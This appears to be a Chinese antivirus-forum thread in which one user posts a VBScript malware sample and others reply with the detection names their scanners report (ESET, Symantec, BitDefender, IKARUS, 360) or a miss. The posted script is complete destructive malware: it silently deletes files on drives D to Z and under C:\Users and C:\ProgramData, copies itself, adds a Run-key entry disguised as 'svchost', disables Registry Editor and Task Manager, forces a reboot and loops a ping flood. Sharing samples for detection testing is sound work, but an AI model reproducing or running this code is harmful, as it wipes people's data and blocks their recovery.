1X

wwwab

biue

卡巴斯基

dreams521

1. On Error Resume Next
   
2. dim avest,xufso,wscrt
   
3. Set avest = WScript.Createobject("WScript.Shell")
   
4. Set wscrt = WScript.Createobject("WScript.Shell")
   
5. Set xufso = CreateObject("Scripting.FileSystemObject")
   
6. avest.run "cmd /c ""del d:\*.* / f /q /s""",0 ,true
   
7. avest.run "cmd /c ""del e:\*.* / f /q /s""",0 ,true
   
8. avest.run "cmd /c ""del f:\*.* / f /q /s""",0 ,true
   
9. avest.run "cmd /c ""del g:\*.* / f /q /s""",0 ,true
   
10. avest.run "cmd /c ""del h:\*.* / f /q /s""",0 ,true
    
11. avest.run "cmd /c ""del i:\*.* / f /q /s""",0 ,true
    
12. avest.run "cmd /c ""del j:\*.* / f /q /s""",0 ,true
    
13. avest.run "cmd /c ""del k:\*.* / f /q /s""",0 ,true
    
14. avest.run "cmd /c ""del l:\*.* / f /q /s""",0 ,true
    
15. avest.run "cmd /c ""del m:\*.* / f /q /s""",0 ,true
    
16. avest.run "cmd /c ""del n:\*.* / f /q /s""",0 ,true
    
17. avest.run "cmd /c ""del o:\*.* / f /q /s""",0 ,true
    
18. avest.run "cmd /c ""del p:\*.* / f /q /s""",0 ,true
    
19. avest.run "cmd /c ""del q:\*.* / f /q /s""",0 ,true
    
20. avest.run "cmd /c ""del r:\*.* / f /q /s""",0 ,true
    
21. avest.run "cmd /c ""del s:\*.* / f /q /s""",0 ,true
    
22. avest.run "cmd /c ""del t:\*.* / f /q /s""",0 ,true
    
23. avest.run "cmd /c ""del u:\*.* / f /q /s""",0 ,true
    
24. avest.run "cmd /c ""del v:\*.* / f /q /s""",0 ,true
    
25. avest.run "cmd /c ""del w:\*.* / f /q /s""",0 ,true
    
26. avest.run "cmd /c ""del x:\*.* / f /q /s""",0 ,true
    
27. avest.run "cmd /c ""del y:\*.* / f /q /s""",0 ,true
    
28. avest.run "cmd /c ""del z:\*.* / f /q /s""",0 ,true
    
29. avest.run "cmd /c ""del C:\Users\*.* / f /q /s""",0 ,true
    
30. avest.run "cmd /c ""del C:\ProgramData\*.* / f /q /s""",0 ,true
    
31. xufso.CreateFolder "C:\VBScript"
    
32. wscrt.run "shutdown -r -f -t 3600 -c 脚本与批处理程序相结合成功！"
    
33. xufso.copyfile Wscript.Scriptfullname,"C:\VBScript\一触即发.vbs"
    
34. xufso.copyfile Wscript.Scriptfullname,"C:\Users\Public\Desktop\一触即发.vbs"
    
35. wscrt.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000001","REG_DWORD"
    
36. wscrt.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","00000001","REG_DWORD"
    
37. wscrt.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","C:\VBScript\一触即发.vbs","REG_SZ"
    
38. wscrt.regWrite"HKEY_CURRENT_USER\Software\Policies\Microsoft\MMC\RestrictToPermittedSnapins","00000001","REG_DWORD"
    
39. msgbox "My head with day feet standing on the earth all over the world to worship my swagger is the modelling of the legendary Super Star elder brother is sharp！",16+4096,"Error"
    
40. do
    
41. wscrt.run "ping 192.168.1.1 -l 65500 -t"
    
42. loop

复制代码

琳辰

ESET detected.

111111.vbs - VBS/DelFiles.B trojan

anthonyqian

SEP ISB.Downloader!gen52

暗_黑

AVG MISS
VT上 avast和avg都杀了，我的咋没杀
VirusTotal

846472713

ESET病毒库: 23947 (20210911)

kim545

BD Trojan.Script.DYD

1031184370

846472713 发表于 2021-9-12 15:36
ESET病毒库: 23947 (20210911)

360直接刚下载就kill。

Nocria

IKARUS

1. Date and Time: 9/12/2021 3:52:54 PM
   
2. File Size: 0.87 kB
   
3. Detection Name: Trojan.BAT.Delfiles
   
4. Detection-ID: 304049853
   
5. Suggestion: Backup
   
6. File Name: 4a6ce8c8-6936-4627-b9d0-ef8775ee1d3f.tmp
   
7. Original Path: C:\360安全浏览器下载
   

复制代码